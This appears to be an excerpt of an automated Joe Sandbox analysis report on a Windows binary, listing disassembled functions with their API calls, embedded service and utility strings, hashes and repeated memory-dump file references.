                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Started, xrefs: 004015A6
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Returning from the worker thread, xrefs: 0040173D
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Workflow Started, xrefs: 0040168F
                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Workflow Start Failed, xrefs: 004016D6
                                                                                                                                                                                                                                                                    • string too long, xrefs: 004013E0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: ServiceWorkerThread: Started$ ServiceWorkerThread: Workflow Start Failed$ ServiceWorkerThread: Workflow Started$ServiceWorkerThread: Returning from the worker thread$string too long
                                                                                                                                                                                                                                                                    • API String ID: 3990507346-493984609
                                                                                                                                                                                                                                                                    • Opcode ID: d82a602f60015f722318a5e5598d58ea829feccefa44ef9ae6b957b033f1123a
                                                                                                                                                                                                                                                                    • Instruction ID: 0de4d92833269bd46795cda1e8f9f860099c4cf613756acb1c3ca96f5a9e6a69
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d82a602f60015f722318a5e5598d58ea829feccefa44ef9ae6b957b033f1123a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0A13BB1A002059BE710DF69DC42B6EB7A4EF40314F24427FE815E73D1EB78994487DA
                                                                                                                                                                                                                                                                    Function 00401DB0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 145COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in SetEvnt $OOBEEvents$OOBEUtils$Receiveded SERVICE_CONTROL_STOP signal$ServiceCtrlHandler: Finished$ServiceCtrlHandler: Started
                                                                                                                                                                                                                                                                    • API String ID: 0-3825141419
                                                                                                                                                                                                                                                                    • Opcode ID: 6ca62fb21f9d5d796d1c64262897b507ae4cdca6753128363298717e489f106b
                                                                                                                                                                                                                                                                    • Instruction ID: 66e086e936243a972247da67edb77e0195688db155f0063ebd03624c2dfed7a4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ca62fb21f9d5d796d1c64262897b507ae4cdca6753128363298717e489f106b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D51C270A81215ABEB10DB15DD46B5E3BA4EB00B18F14017BF905B73D1EF78A9048BEE
                                                                                                                                                                                                                                                                    Function 004165A0 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 154COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,00000000,?,00404FB7,00000000,00000000,004B0CCA,00000000), ref: 004165BA
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 00416661
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00416678
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                    • String ID: Error allocating memory while converting UTF8 string to Native string$Failed to convert MultiByteToWideChar. ErrorCode::%d$OOBEUtils$StringUtils
                                                                                                                                                                                                                                                                    • API String ID: 1717984340-475419079
                                                                                                                                                                                                                                                                    • Opcode ID: 2ac2b592db3f9692cb7a5b3bc46003a3bf626419324c79dd5455d25ea0bdc311
                                                                                                                                                                                                                                                                    • Instruction ID: 607fb1377a63fdc9f035f0c432f6c8044d68b344f7ff51ac538f5213003713f8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ac2b592db3f9692cb7a5b3bc46003a3bf626419324c79dd5455d25ea0bdc311
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0418D35781214A7C620AF6AAC47FEB7358EB81B25F1401BBFD09A32D0DD69AD0046ED
                                                                                                                                                                                                                                                                    Function 00412610 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004126EE
                                                                                                                                                                                                                                                                    • __Getctype.LIBCPMT ref: 00412707
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00412751
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004127EF
                                                                                                                                                                                                                                                                    • __Getwctype.LIBCPMT ref: 0041282A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Locinfo::_$GetctypeGetwctypeLocinfo_ctorLocinfo_dtorLockitLockit::~_
                                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                                    • API String ID: 201867346-1405518554
                                                                                                                                                                                                                                                                    • Opcode ID: 1af70972fbd8fd394261b7672b218bb29ee07418f61f38ba363869a3bb34d789
                                                                                                                                                                                                                                                                    • Instruction ID: fb01a51910be7c6eaa99b540ff2eac30bca8d6a60054ec657d3f721683236568
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1af70972fbd8fd394261b7672b218bb29ee07418f61f38ba363869a3bb34d789
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 525193B1C003589BEB10DFA5C945BDAB7B4BF14314F14826ED848E7341EB78EA94CB66
                                                                                                                                                                                                                                                                    Function 0041FA30 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77synchronizationCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000008,000000FF,00000000,00000008,00405984,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB10
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB19
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandleObjectSingleWait
                                                                                                                                                                                                                                                                    • String ID: All pipes closed properly.$CommBridge$Inside closeBridge$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 528846559-1211123791
                                                                                                                                                                                                                                                                    • Opcode ID: 1f3c2fab79f574a5bc492b236c571b4ebadb7da9787cdc0bcc3f81ec269f5a84
                                                                                                                                                                                                                                                                    • Instruction ID: c28e8b6ec9cc632472ca235f45b3f8d0a108cff224a1436875239388707932b2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f3c2fab79f574a5bc492b236c571b4ebadb7da9787cdc0bcc3f81ec269f5a84
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3421D330B40321A7CA20EF268C56F873B54AF12F11F240577B806A72D0CEACF99187AD
                                                                                                                                                                                                                                                                    Function 0048857A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00488689,0040B377,?,00000000,?,?,?,004888B3,00000022,FlsSetValue,004A3F04,004A3F0C,?), ref: 0048863B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                    • Opcode ID: 11c0850fd9dd82efe467599ba98e49e0b0b665d46b4f2ea3fd8847a1b3d20761
                                                                                                                                                                                                                                                                    • Instruction ID: 0d18bb84f8fc76a6c3da93e18ff47703567a800fd64ff94e1cc0b507c8cbf4c8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11c0850fd9dd82efe467599ba98e49e0b0b665d46b4f2ea3fd8847a1b3d20761
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C21C331A01221ABCB21AB259C41A9F37589B51760F64096BE906B7390EF38ED00CBDD
                                                                                                                                                                                                                                                                    Function 00427260 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,0040653E), ref: 0042726E
                                                                                                                                                                                                                                                                    • PathIsDirectoryW.SHLWAPI(?), ref: 00427283
                                                                                                                                                                                                                                                                    • SHCreateDirectoryExW.SHELL32(00000000,?,00000000,?,?,0040653E), ref: 0042729D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
